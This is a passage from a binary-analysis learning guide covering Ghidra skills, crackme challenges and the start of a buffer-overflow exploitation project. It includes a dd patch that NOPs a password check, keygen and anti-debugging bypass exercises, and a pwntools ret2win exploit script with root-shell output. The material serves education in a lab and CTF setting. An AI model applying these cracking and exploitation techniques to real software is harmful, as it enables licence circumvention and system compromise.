  • How does stack frame analysis help identify local variables vs parameters?

Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Procedures

4. Type Inference

Decompilers guess variable types from their usage (pointer arithmetic, function calls, comparisons). Understanding this helps you correct wrong guesses.

Guiding Questions:

  • How does Ghidra infer that mov rax, [rbx] suggests rbx is a pointer?
  • What clues indicate a variable is a string vs a byte array?
  • When do you need to manually fix type annotations?

Book Reference: “Practical Binary Analysis” Ch. 6.3 - Disassembly and Binary Analysis Fundamentals

5. Symbol Resolution

Binaries often lack symbol names. Learning to identify functions by their behavior (string references, API calls) is critical.

Guiding Questions:

  • How do you identify main() in a stripped binary?
  • What patterns indicate a function is a constructor vs destructor?
  • How do import tables help identify library functions?

Book Reference: “Practical Binary Analysis” Ch. 5 - Basic Binary Analysis in Linux

6. Cross-References (Xrefs)

Xrefs show where data/code is used. They’re essential for understanding program flow and finding all uses of a particular function or string.

Guiding Questions:

  • What’s the difference between “calls to” and “called by” in xref analysis?
  • How do you use xrefs to find all error-handling code paths?
  • Why do string references often lead directly to interesting functionality?

Book Reference: “Ghidra Software Reverse Engineering for Beginners” Ch. 3
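Under the hood, xrefs are just an inverted index over references. A toy model of "calls to" vs "called by" (the call sites below are invented, echoing the login example used elsewhere in this guide):

```python
def build_xrefs(calls):
    """calls: (from_func, to_func) pairs -> forward and reverse maps."""
    calls_to, called_by = {}, {}
    for src, dst in calls:
        calls_to.setdefault(src, []).append(dst)     # what src calls
        called_by.setdefault(dst, []).append(src)    # who calls dst
    return calls_to, called_by

calls = [("main", "login_handler"),
         ("login_handler", "validate_password"),
         ("validate_password", "error_message"),
         ("login_handler", "error_message")]
calls_to, called_by = build_xrefs(calls)
print(called_by["error_message"])   # every path that can show the error string
```

Walking `called_by` transitively from a string's display function back to main is exactly the xref-tracing exercise below.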

7. Calling Conventions

Different platforms pass arguments differently (stack vs registers, order, cleanup responsibility). Ghidra auto-detects these but you need to verify.

Guiding Questions:

  • What’s the difference between __cdecl, __stdcall, and __fastcall?
  • How does x64’s register-based calling differ from x86’s stack-based?
  • When does Ghidra get calling conventions wrong?

Book Reference: “Low-Level Programming” Ch. 9 - Calling Conventions

8. Ghidra Scripting API

Automating analysis with scripts lets you handle repetitive tasks (renaming, searching, reporting) efficiently.

Guiding Questions:

  • What’s the difference between Ghidra’s Java API and Python (Ghidrathon)?
  • How do you iterate over all functions in a program?
  • When should you write a script vs use built-in features?

Book Reference: Official Ghidra API Documentation (included with Ghidra)

Questions to Guide Your Design

  1. How do you efficiently navigate a 100,000-line decompiled binary to find the password validation logic? Consider string searches, API call tracking, and symbolic execution.

  2. When Ghidra’s decompiler produces confusing code (nested ternaries, weird casts), what strategies help you simplify it? Think about variable renaming, type fixing, and understanding the original source idiom.

  3. How would you write a script to find all uses of dangerous functions (strcpy, gets, sprintf) across multiple binaries? Consider iteration, filtering, and reporting.

  4. What workflow lets you collaborate with teammates on reversing a large binary? Think about Ghidra project sharing, version control, and annotation standards.

  5. How do you handle obfuscated or packed binaries that confuse Ghidra’s auto-analysis? Consider manual disassembly, unpacking, and custom analysis passes.

  6. What’s your process for documenting your reverse engineering findings so others can understand them? Think about commenting standards, structure diagrams, and pseudocode.

  7. How would you diff two versions of a binary to find what changed in a security patch? Consider Ghidra’s version tracking and binary diffing capabilities.

  8. When analyzing malware, what sandbox/isolation setup ensures your Ghidra analysis doesn’t trigger malicious behavior? Think about static vs dynamic analysis boundaries.

Thinking Exercise

Before writing any Ghidra scripts, complete this exercise:

  1. Manual CFG Construction: Take a simple crackme binary (20-30 functions). Draw the control flow graph of the password validation function by hand:
    • Identify basic blocks (sequences ending in jumps/branches)
    • Draw edges for conditional and unconditional jumps
    • Label edges with conditions (e.g., “password correct”, “length check failed”)
    • Mark which paths lead to success vs failure
  2. Type Inference Practice: Look at this decompiled snippet:
    undefined8 FUN_00401234(long param_1) {
        long lVar1;
        lVar1 = param_1 + 0x10;
        *lVar1 = 0x41414141;
        return 0;
    }
    

    Without running it, infer:

    • Is param_1 a struct pointer? Array? Something else?
    • What type should lVar1 be (not just long)?
    • What’s really happening in *lVar1 = 0x41414141?
    • Rewrite it with meaningful names and types.
  3. Cross-Reference Tracing: In a binary with debug symbols removed:
    • Find the string “Invalid password” in Ghidra
    • Use xrefs to find which function displays it
    • Trace back to find what calls that function
    • Continue until you find the entry point (main)
    • Document the call chain: main() -> login_handler() -> validate_password() -> error_message()
  4. API Identification: Open a Windows PE binary in Ghidra:
    • List all imported DLLs and functions (use Imports window)
    • Categorize APIs: networking (ws2_32.dll), crypto (advapi32.dll), file I/O (kernel32.dll)
    • For each interesting import, find all calls to it
    • Infer program capabilities (e.g., “Connects to network, encrypts files”)

The Interview Questions They’ll Ask

  1. “Explain how Ghidra’s decompiler works at a high level. What are the major stages?” Expected: Disassembly → CFG construction → P-Code conversion → SSA form → Type inference → C code generation

  2. “You’re reversing a binary and Ghidra shows a function with 50 parameters. What went wrong and how do you fix it?” Expected: Ghidra misidentified the calling convention or function boundary. Check for stack frame setup, use “Edit Function Signature”, verify with debugging.

  3. “How would you use Ghidra to find all SQL injection vulnerabilities in a closed-source web server binary?” Expected: Search for SQL keywords in strings, xref to find query-building code, trace backwards to find unsanitized user input paths.

  4. “What’s the difference between Ghidra’s P-Code and LLVM IR? Why does Ghidra use P-Code?” Expected: P-Code is designed for decompilation (reverse direction), LLVM IR for compilation (forward). P-Code is simpler and architecture-neutral.

  5. “Walk me through your process for analyzing a stripped binary with no symbols.” Expected: Find entry point → identify main (heuristics: called once, calls many) → name key functions → follow interesting strings → build call graph.

  6. “You need to analyze 100 similar malware samples. How do you automate commonality extraction with Ghidra?” Expected: Write headless Ghidra script to batch-process samples, extract features (strings, APIs, crypto constants), generate similarity matrix.

  7. “Ghidra’s decompiler shows code that couldn’t possibly compile. Give three reasons why.” Expected: Hand-written assembly with no C equivalent, compiler optimizations (like overlapping variables), incorrect type inference.

  8. “How do you identify crypto algorithms (AES, SHA256) in decompiled code?” Expected: Look for characteristic constants (AES S-box: 0x63, 0x7c…), specific bit operations, large lookup tables, entropy analysis.

  9. “What are the limitations of static analysis with Ghidra vs dynamic analysis with a debugger?” Expected: Static can’t handle runtime unpacking/decryption, indirect calls, or input-dependent behavior. Dynamic requires execution environment.

  10. “Describe a real scenario where writing a Ghidra script saved you significant time.” Expected: Personal example, e.g., “Found all format string bugs in a 500KB binary by automating xref analysis of printf-family functions.”
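The crypto-constant heuristic from question 8 is easy to prototype: the AES S-box really does begin 63 7c 77 7b f2 6b 6f c5, so scanning a binary's bytes for that prefix flags candidate AES tables. A minimal sketch (the fake blob is invented for the demo):

```python
# First 8 bytes of the standard AES S-box lookup table.
AES_SBOX_PREFIX = bytes([0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5])

def find_aes_sbox(blob):
    """Return every offset where the AES S-box prefix appears in the blob."""
    hits, start = [], 0
    while True:
        i = blob.find(AES_SBOX_PREFIX, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1

# Fake "binary": padding, then an embedded S-box table fragment.
blob = b"\x00" * 100 + AES_SBOX_PREFIX + b"\x30\x01"
print(find_aes_sbox(blob))
```

The same pattern works for SHA-256's initial hash words, CRC tables, and other well-known constants; tools like FindCrypt automate exactly this scan.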

Books That Will Help

| Topic | Book | Chapter/Section |
| --- | --- | --- |
| Ghidra Basics & UI | “Ghidra Software Reverse Engineering for Beginners” | Ch. 1-4 (Installation, UI, Basic Analysis) |
| Decompilation Theory | “Practical Binary Analysis” | Ch. 6 (Binary Analysis Fundamentals) |
| Control Flow Graphs | “Practical Binary Analysis” | Ch. 7 (Simple Code Injection) |
| x86/x64 Assembly | “Low-Level Programming” | Ch. 3-4 (Assembly Language, Syntax) |
| Calling Conventions | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 (Procedures) |
| Stack Frames | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7.5 (Stack Frames) |
| Symbol Tables & Linking | “Computer Systems: A Programmer’s Perspective” | Ch. 7 (Linking) |
| Reverse Engineering Methodology | “Reversing: Secrets of Reverse Engineering” | Ch. 1-3 (Foundations) |
| Static Analysis Techniques | “Practical Malware Analysis” | Ch. 1, 5 (Basic Static Analysis) |
| Ghidra Scripting (Java) | Official Ghidra Docs | GhidraAPI.html (included) |
| Ghidra Scripting (Python) | Ghidrathon GitHub Docs | README and examples |
| Binary File Formats (ELF) | “Practical Binary Analysis” | Ch. 2 (ELF Format) |
| Binary File Formats (PE) | “Practical Binary Analysis” | Ch. 3 (PE Format) |
| Data Flow Analysis | “Compilers: Principles, Techniques, and Tools” (Dragon Book) | Ch. 9 (Machine-Independent Optimizations) |
| Type Inference | “Practical Binary Analysis” | Ch. 6.3 (Disassembly) |
| Advanced Reversing | “The IDA Pro Book” | Ch. 5-8 (applies to Ghidra too) |

Project 6: Crackme Challenges

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python for keygens
  • Alternative Programming Languages: Any
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Reverse Engineering / Password Bypass
  • Software or Tool: Ghidra, GDB, crackmes.one
  • Main Book: “Reversing: Secrets of Reverse Engineering” by Eldad Eilam

What you’ll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges you’ll face:

  • Finding the check → maps to string references, control flow
  • Understanding the algorithm → maps to decompilation, debugging
  • Patching vs keygen → maps to two approaches to bypass
  • Anti-debugging → maps to detection evasion

Resources for key challenges:

Key Concepts:

  • Patching: Tutorial #10 - The Levels of Patching
  • Keygen Writing: “Reversing” Ch. 5 - Eilam
  • Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

Difficulty: Intermediate Time estimate: 2-4 weeks Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
# Approach 1: Patching

$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) jumps to the failure path
# Patch JNE to JE (or NOP it out)

$ xxd crackme | grep "75 28"
00001234: 75 28                      # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc   # 4660 = 0x1234
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337

$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34
```


**Implementation Hints**:

Systematic approach:
1. Run the binary to understand expected behavior
2. Find strings ("Enter password", "Access Denied")
3. Find cross-references to those strings
4. Trace backwards to find the comparison
5. Understand what makes it pass
6. Either patch the jump or write a keygen

Patching levels:
1. **LAME**: NOP out the check entirely
2. **Better**: Invert the jump condition
3. **Good**: Patch the comparison to always succeed
4. **Best**: Understand algorithm, write keygen
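The jump inversion (level 2) is a one-byte edit: `jne` (0x75) and `je` (0x74) differ only in the opcode's low bit. A minimal sketch in Python, assuming you have already located the file offset of the jump; the filename and byte layout below are made up for illustration:

```python
# Flip a jne (0x75) to je (0x74) at a known file offset.
# The offset is hypothetical -- find the real one in Ghidra, or with
# objdump -d plus the section's address-to-file-offset mapping.

def patch_jump(path, offset, expect=0x75, new=0x74):
    with open(path, "r+b") as f:
        f.seek(offset)
        old = f.read(1)[0]
        if old != expect:
            raise ValueError(f"expected {expect:#x} at {offset:#x}, found {old:#x}")
        f.seek(offset)
        f.write(bytes([new]))

# Demo against a scratch file standing in for the binary:
with open("crackme_copy", "wb") as f:
    f.write(b"\x90\x90\x75\x28\x90")   # ...jne +0x28...

patch_jump("crackme_copy", 2)          # jne -> je

with open("crackme_copy", "rb") as f:
    assert f.read()[2] == 0x74         # now je
```

Checking the byte you are about to overwrite (the `expect` guard) is cheap insurance against patching the wrong offset.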

Questions:
- What's the difference between `JE` and `JNE`?
- How do you find the password comparison in decompiled code?
- What are common string comparison functions?

**Learning milestones**:
1. **Solve easy crackmes** → Find obvious password checks
2. **Understand algorithms** → XOR, hashing, encoding
3. **Write keygens** → Reverse the algorithm
4. **Bypass protections** → Handle obfuscation

### The Core Question You're Answering

**How do you systematically reverse engineer authentication mechanisms, understand their underlying algorithms, and create tools to bypass or generate valid credentials—all without source code?**

This project teaches the complete reverse engineering workflow: from initial binary exploration to algorithm extraction to automated solution generation. You'll learn both the "quick and dirty" approach (patching) and the "deep understanding" approach (keygen writing).

### Concepts You Must Understand First

#### 1. String References and Cross-References
Most crackmes leave clues in strings ("Correct!", "Wrong password"). Learning to trace from strings to code is your first reverse engineering skill.

**Guiding Questions**:
- Why do string references often lead directly to validation logic?
- How do you distinguish between format strings and actual password strings?
- What happens when strings are obfuscated or encrypted at runtime?

**Book Reference**: "Practical Binary Analysis" Ch. 5.4 - Finding Main Manually

#### 2. Comparison Operations in Assembly
Password checks ultimately boil down to comparisons: `cmp`, `test`, `sub` followed by conditional jumps. Recognizing these patterns is essential.

**Guiding Questions**:
- What's the difference between `cmp rax, rbx` and `test rax, rax`?
- How do `je`, `jne`, `jz`, `jnz` relate to the zero flag?
- Why does `sub` set flags differently than `cmp`?

**Book Reference**: "Low-Level Programming" Ch. 5 - Arithmetic and Logical Operations

#### 3. Control Flow Manipulation (Patching)
The simplest bypass is changing a conditional jump (`je` → `jne`) or removing checks entirely (NOP padding).

**Guiding Questions**:
- What's the opcode for `jne` vs `je`, and how do you swap them?
- Why is NOPing (0x90) preferred over zeroing bytes?
- How do you ensure patch size matches original instruction size?

**Book Reference**: "Hacking: The Art of Exploitation" Ch. 3 - Exploitation

#### 4. Common Validation Algorithms
Crackmes use predictable patterns: XOR encoding, simple hashing (MD5/SHA), base64, character manipulation.

**Guiding Questions**:
- How do you recognize XOR in assembly (repeated `xor` with constants)?
- What does a SHA256 implementation look like in decompiled code?
- How do you distinguish encryption from simple obfuscation?

**Book Reference**: "Reversing: Secrets of Reverse Engineering" Ch. 5 - Applied Reverse Engineering

#### 5. Keygen Development
Once you understand the algorithm, you reverse it: if validation does `hash(input) == stored_hash`, your keygen does `input = reverse_hash(stored_hash)`.

**Guiding Questions**:
- What algorithms are reversible (XOR, Caesar cipher) vs irreversible (SHA256)?
- How do you handle one-way hashes (hint: you can't reverse them)?
- When is it easier to brute force than to write a perfect keygen?

**Book Reference**: "Reversing: Secrets of Reverse Engineering" Ch. 5
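The sample session earlier shows the recovered algorithm `password = (username XOR 0x55) + 0x1337`. A keygen sketch for it follows; interpreting "username XOR 0x55" as the sum of each byte XORed with 0x55 is an assumption — the real crackme defines the exact combination:

```python
# Keygen sketch for the example algorithm from the sample session:
#   password = (username XOR 0x55) + 0x1337
# Assumption: "username XOR 0x55" means the sum of per-byte XORs.

def keygen(username: str) -> int:
    acc = sum(b ^ 0x55 for b in username.encode())
    return acc + 0x1337

def validate(username: str, password: int) -> bool:
    # Mirror of the check the binary would perform
    return password == keygen(username)

print(f"Valid password for 'admin': {keygen('admin'):#x}")
assert validate("admin", keygen("admin"))
```

Writing the `validate()` mirror alongside the keygen is good practice: it lets you test your understanding of the algorithm before touching the real binary.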

#### 6. Anti-Debugging Basics
Some crackmes detect debuggers using `ptrace`, timing checks, or `IsDebuggerPresent()`. You'll need to recognize and bypass these.

**Guiding Questions**:
- How does the `ptrace(PTRACE_TRACEME)` trick detect debuggers?
- What's a timing-based anti-debug check and how do you defeat it?
- Why do debuggers change program behavior even without breakpoints?

**Book Reference**: "Practical Malware Analysis" Ch. 15 - Anti-Debugging

#### 7. Binary Patching Tools and Techniques
You'll need to modify binaries with hex editors, `dd`, or specialized tools like `radare2` or Binary Ninja.

**Guiding Questions**:
- How do you find the file offset of a memory address in an ELF/PE binary?
- What's the difference between patching in-memory vs on-disk?
- How do you verify your patch didn't corrupt the binary?

**Book Reference**: "Practical Binary Analysis" Ch. 7 - Simple Code Injection

#### 8. Input Validation and User Input Flow
Understanding where user input enters (stdin, argv, environment variables) and how it's processed helps you trace to the validation logic.

**Guiding Questions**:
- How do you identify `scanf`, `fgets`, or `read` calls in disassembly?
- Where does command-line input (`argv`) appear in the program state?
- How do you trace tainted input through the program?

**Book Reference**: "Computer Systems: A Programmer's Perspective" Ch. 8.4 - Process Control

### Questions to Guide Your Design

1. **Given a crackme that accepts a serial number, what's your systematic process to find the validation function?** Consider strings, imports, control flow, and data flow.

2. **When is patching preferable to writing a keygen, and vice versa?** Think about time investment, learning value, and reusability.

3. **How would you approach a crackme that generates a unique serial for each user's machine (HWID-based)?** Consider what machine identifiers it might use (MAC address, disk serial, CPU ID).

4. **What strategies help when the password check is heavily obfuscated (no strings, indirect jumps)?** Think about dynamic analysis, symbolic execution, and emulation.

5. **How do you build a test suite for your keygen to ensure it works for all inputs?** Consider edge cases, random testing, and comparing against the original binary.

6. **When a crackme uses a cryptographic hash (SHA256), what are your options since you can't reverse it?** Think about rainbow tables, brute force, or patching the comparison.

7. **How would you document your reverse engineering process so others can learn from your analysis?** Consider annotated disassembly, step-by-step walkthroughs, and algorithm explanations.

8. **What ethical and legal considerations apply to cracking software, even in a learning context?** Think about responsible disclosure, CTF vs commercial software, and intent.

### Thinking Exercise

**Before attempting any crackmes, complete this exercise**:

1. **Manual Algorithm Reversal**: Here's a simple validation function in C:
   ```c
   int validate(char *input) {
       int sum = 0;
       for (int i = 0; i < strlen(input); i++) {
           sum += input[i] ^ 0x42;
       }
       return sum == 0x1337;
   }
   ```
  • Compile it (without optimization: gcc -O0)
  • Disassemble it with objdump or load in Ghidra
  • Identify the loop structure in assembly
  • Find the XOR operation and the constant 0x42
  • Find the final comparison with 0x1337
  • Write a keygen in Python that generates valid inputs
  2. Patch Practice: Create a simple password checker:
    #include <stdio.h>
    #include <string.h>
    int main() {
        char pass[32];
        printf("Password: ");
        scanf("%s", pass);
        if (strcmp(pass, "secret") == 0) {
            printf("Correct!\n");
        } else {
            printf("Wrong!\n");
        }
    }
    
    • Compile it
    • Find the strcmp call in assembly (use objdump -d or Ghidra)
    • Note the conditional jump after the comparison
    • Patch the binary three ways:
      • Method 1: Change jne to je (swap success/failure)
      • Method 2: NOP out the entire check
      • Method 3: Change the comparison to cmp rax, rax (always equal)
    • Verify each patch works
  3. Trace User Input: Take this program:
    int main(int argc, char **argv) {
        if (argc != 2) return 1;
        int key = atoi(argv[1]);
        key = (key * 13) + 37;
        key ^= 0xDEADBEEF;
        if (key == 0x12345678) {
            printf("Win!\n");
        }
    }
    
    • Trace argv[1] through each transformation
    • Write the mathematical inverse: key = ((target ^ 0xDEADBEEF) - 37) / 13 (the multiplication wraps modulo 2^32, so if the division isn’t exact, multiply by the modular inverse of 13 mod 2^32 instead)
    • Implement in Python and find the winning input
    • Verify by running the original binary
  4. Anti-Debug Detection: Create a program with ptrace anti-debugging:
    #include <sys/ptrace.h>
    #include <stdio.h>
    int main() {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
            printf("Debugger detected!\n");
            return 1;
        }
        printf("Not debugging\n");
        // rest of program
    }
    
    • Try running it under GDB (it will detect the debugger)
    • Bypass it by:
      • Method 1: Patching the ptrace call to always return 0
      • Method 2: Setting a breakpoint before ptrace and changing the return value
      • Method 3: Using LD_PRELOAD to hook ptrace
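For exercise 1 above, the inverse is underdetermined — many strings hit the target checksum — so a keygen can simply search. A sketch, assuming the check is exactly the C snippet shown (sum of each character XOR 0x42 must equal 0x1337) and that the input must be printable:

```python
# Keygen for exercise 1: find s with sum(c ^ 0x42 for c in s) == 0x1337.
TARGET = 0x1337  # 4919, which happens to be prime, so no single repeated
                 # character works; we need a filler plus a closing character.

def checksum(s: str) -> int:
    return sum(ord(c) ^ 0x42 for c in s)

def keygen(target: int = TARGET) -> str:
    printable = range(0x21, 0x7F)
    values = {c ^ 0x42: chr(c) for c in printable}  # XOR is bijective: no clashes
    # Try each printable character as a repeated filler, then close the
    # remaining gap with one character whose XORed value matches exactly.
    for fill_v, fill_c in values.items():
        if fill_v == 0:
            continue
        n, rest = divmod(target, fill_v)
        if rest in values:
            return fill_c * n + (values[rest] if rest else "")
    raise ValueError("no solution with this scheme")

key = keygen()
assert checksum(key) == TARGET
print(f"found a {len(key)}-character key")
```

Verify your key against the compiled binary, not just against your own `checksum()` — agreement between the two is the real test of your reversing.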

The Interview Questions They’ll Ask

  1. “Walk me through your methodology for solving an unknown crackme from start to finish.” Expected: Run it → check strings → find validation → understand algorithm → patch or keygen → verify success.

  2. “What’s the difference between je and jne at the opcode level, and how would you patch one to the other?” Expected: je (0x74), jne (0x75). They differ by one bit. Patch by changing byte at that offset.

  3. “You find this assembly: xor eax, eax; test eax, eax; je 0x401234. What’s happening and is there a shortcut?” Expected: xor eax, eax zeroes eax, test sets zero flag, je always jumps. Shortcut: jmp 0x401234.

  4. “How would you approach a crackme that checks username AND serial number together (no valid serial without the right username)?” Expected: Trace both inputs, find where they’re combined (concatenation, XOR), understand the relationship, write a keygen that takes username as input.

  5. “Explain three different patching strategies and when you’d use each.” Expected: (1) Invert jump—quick but obvious; (2) NOP the check—clean; (3) Change comparison target—stealthy. Use based on goals (speed vs stealth).

  6. “A crackme uses MD5(serial) == ‘abc123…’. Can you write a keygen? What are your options?” Expected: Can’t reverse MD5. Options: brute force (if short), rainbow table lookup, or patch the comparison.

  7. “How do you identify a validation loop (character-by-character check) in disassembly?” Expected: Look for loop structures (counter increment, conditional jump back), array indexing, character-wise operations.

  8. “What’s the ‘cyclic pattern’ technique and how is it useful in crackmes?” Expected: Generates unique substrings to identify buffer positions. Useful for finding offset to critical data in password buffers.

  9. “You’ve reversed the algorithm but your keygen produces ‘valid’ serials that the program rejects. What went wrong?” Expected: Likely issues: integer overflow, endianness, off-by-one errors, missing constraints (e.g., serial must be printable ASCII).

  10. “Describe the legal and ethical boundaries of reverse engineering copy protection.” Expected: CTF/educational crackmes are legal. Commercial software varies by jurisdiction (DMCA, EU directives). Intent matters. Always use isolated VMs.
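The cyclic-pattern idea from question 8 can be sketched without pwntools. This toy version uses unique aligned 4-byte chunks rather than pwntools’ true de Bruijn sequence, so unlike the real `cyclic()`/`cyclic_find()` it only recovers offsets that are multiples of 4:

```python
import itertools
import string

def toy_cyclic(n: int) -> bytes:
    # Concatenate unique 4-byte chunks built from lowercase letters.
    # (pwntools orders its pattern differently; this is just the idea.)
    chunks = (bytes(t) for t in
              itertools.product(string.ascii_lowercase.encode(), repeat=4))
    out = b"".join(itertools.islice(chunks, (n + 3) // 4))
    return out[:n]

def toy_cyclic_find(chunk: bytes, pattern: bytes) -> int:
    # The 4 bytes that landed in the crash register identify their offset.
    return pattern.index(chunk)

pat = toy_cyclic(200)
# Suppose the crash left these 4 bytes in the saved return address slot:
crash = pat[72:76]
assert toy_cyclic_find(crash, pat) == 72
```

Because every chunk appears exactly once, the bytes sitting in the crashed register pinpoint how far into the buffer the critical data lives.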

Books That Will Help

| Topic | Book | Chapter/Section |
| --- | --- | --- |
| Reverse Engineering Fundamentals | “Reversing: Secrets of Reverse Engineering” | Ch. 1-3 (Foundations, RE Process) |
| Applied Crackme Solving | “Reversing: Secrets of Reverse Engineering” | Ch. 5 (Applied RE) |
| x86/x64 Comparison Operations | “Low-Level Programming” | Ch. 5.3 (Conditional Jumps) |
| Control Flow in Assembly | “Low-Level Programming” | Ch. 6 (Control Flow) |
| String Analysis | “Practical Binary Analysis” | Ch. 5.4 (Finding Functions) |
| Binary Patching Techniques | “Practical Binary Analysis” | Ch. 7 (Code Injection) |
| Debugger Usage (GDB) | “Hacking: The Art of Exploitation” | Ch. 2 (Programming) |
| Anti-Debugging Techniques | “Practical Malware Analysis” | Ch. 15 (Anti-Debugging) |
| Common Crypto Algorithms | “Serious Cryptography” | Ch. 1-6 (Hashing, Encryption) |
| Assembly Language Basics | “Computer Systems: A Programmer’s Perspective” | Ch. 3 (Machine-Level Representation) |
| Stack and Calling Conventions | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 (Procedures) |
| Tool Usage (Ghidra) | “Ghidra Software Reverse Engineering for Beginners” | Ch. 4-6 (Analysis Features) |
| Input Tracing | “Computer Systems: A Programmer’s Perspective” | Ch. 8.4 (Process Control) |
| Opcode Reference | “Low-Level Programming” | Appendix A (x86-64 Instruction Reference) |
| Hex Editing and Binary Structure | “Practical Binary Analysis” | Ch. 2 (Binary Formats) |

Project 7: Buffer Overflow Exploitation

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (targets), Python (exploits)
  • Alternative Programming Languages: Assembly for shellcode
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Binary Exploitation / Memory Corruption
  • Software or Tool: GDB, pwntools, checksec
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypassing ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges you’ll face:

  • Finding the offset → maps to pattern generation, EIP/RIP control
  • Controlling execution → maps to return address overwrite
  • Bypassing NX → maps to return-to-libc, ROP
  • Bypassing ASLR → maps to info leaks, partial overwrite

Resources for key challenges:

Key Concepts:

  • Stack Layout: “Hacking: Art of Exploitation” Ch. 2
  • Shellcode: “Hacking: Art of Exploitation” Ch. 5
  • Return-Oriented Programming: “Practical Binary Analysis” Ch. 10

Difficulty: Advanced Time estimate: 3-4 weeks Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```python
from pwn import *

# Connect to target
p = process('./vulnerable')

# Find offset with pattern
offset = 72

# Build payload
payload = b'A' * offset        # Fill buffer
payload += p64(0x401337)       # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()
```

Output:

```
[*] Switching to interactive mode
$ whoami
root
$ cat flag.txt
FLAG{buffer_overflow_mastered}
```


**Implementation Hints**:

Progression:
1. **ret2win**: Overwrite return address to call `win()` function
2. **ret2shellcode**: Jump to shellcode on stack (no NX)
3. **ret2libc**: Return to `system("/bin/sh")` (bypass NX)
4. **ROP chain**: Chain gadgets for complex operations
5. **GOT overwrite**: Hijack function pointers
6. **Format string**: Arbitrary read/write

Finding offset:
```python
from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian
```

Key questions:

  • How do you find the offset to the return address?
  • What’s the difference between 32-bit and 64-bit exploitation?
  • How do you find useful libc functions when ASLR is enabled?

Learning milestones:

  1. Control EIP/RIP → Overwrite return address
  2. Execute shellcode → Spawn a shell (no NX)
  3. ROP chains → Bypass NX with gadgets
  4. Leak addresses → Bypass ASLR

The Core Question You’re Answering

How do you exploit unsafe memory operations to hijack program control flow, execute arbitrary code, and bypass modern security mitigations—all by understanding the precise layout of memory at runtime?

This project bridges theory and practice: you’ll see how textbook stack diagrams become real exploitable conditions, and how security features (NX, ASLR, stack canaries) force increasingly sophisticated attack techniques.

Concepts You Must Understand First

1. The Stack Memory Layout

The stack grows downward (high to low addresses) and stores local variables, saved registers, and return addresses. Understanding this layout is essential for exploitation.

High addresses
+------------------+
| Command-line args|
| (argv, envp)     |
+------------------+
| Stack            |
| (grows down)     |
|                  |
|  +-----------+   |  <-- Current function's stack frame
|  | Local vars|   |
|  | (buffer)  |   |
|  +-----------+   |
|  | Saved RBP |   |  <-- Frame pointer (base of previous frame)
|  +-----------+   |
|  | Ret addr  |   |  <-- Return address (TARGET FOR OVERWRITE)
|  +-----------+   |
|  | Arguments |   |
|  +-----------+   |
|      ...         |
|                  |
+------------------+
| Heap             |
| (grows up)       |
+------------------+
| .bss (uninit)    |
+------------------+
| .data (init)     |
+------------------+
| .text (code)     |
+------------------+
Low addresses

Guiding Questions:

  • Why does the stack grow downward while arrays grow upward (creating overflow)?
  • What’s stored between a buffer and the return address?
  • How does the saved frame pointer (RBP) help identify stack frame boundaries?

Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Procedures

2. Buffer Overflow Mechanics

When strcpy(buffer, user_input) copies more data than the buffer can hold, it overwrites adjacent memory—including saved RBP and return address.

Guiding Questions:

  • Why are functions like gets(), strcpy(), and sprintf() dangerous?
  • What’s the difference between stack overflow (too much data) and stack smashing (deliberate overwrite)?
  • How do you calculate the exact offset from buffer start to return address?

Book Reference: “Hacking: The Art of Exploitation” Ch. 2.5 - Buffer Overflows

3. Return Address Hijacking

The return address (pushed by call, popped by ret) determines where execution goes after a function. Overwriting it redirects control flow.

Guiding Questions:

  • What does the ret instruction do at the assembly level?
  • Why must your payload preserve stack alignment (especially on x64)?
  • What happens if you overwrite the return address with an invalid address?

Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7.3 - Data Transfer

4. Shellcode Development

Shellcode is position-independent assembly code that spawns a shell or executes commands. It must avoid null bytes (which terminate string copies).

Guiding Questions:

  • Why does shellcode use execve("/bin/sh", NULL, NULL) instead of system("/bin/sh")?
  • How do you write position-independent code (no hardcoded addresses)?
  • What techniques eliminate null bytes (e.g., xor eax, eax instead of mov eax, 0)?

Book Reference: “Hacking: The Art of Exploitation” Ch. 5 - Shellcode

5. NX (No-Execute) Protection

Modern systems mark the stack as non-executable, preventing shellcode execution. This forces attackers to use existing code (return-to-libc, ROP).

Guiding Questions:

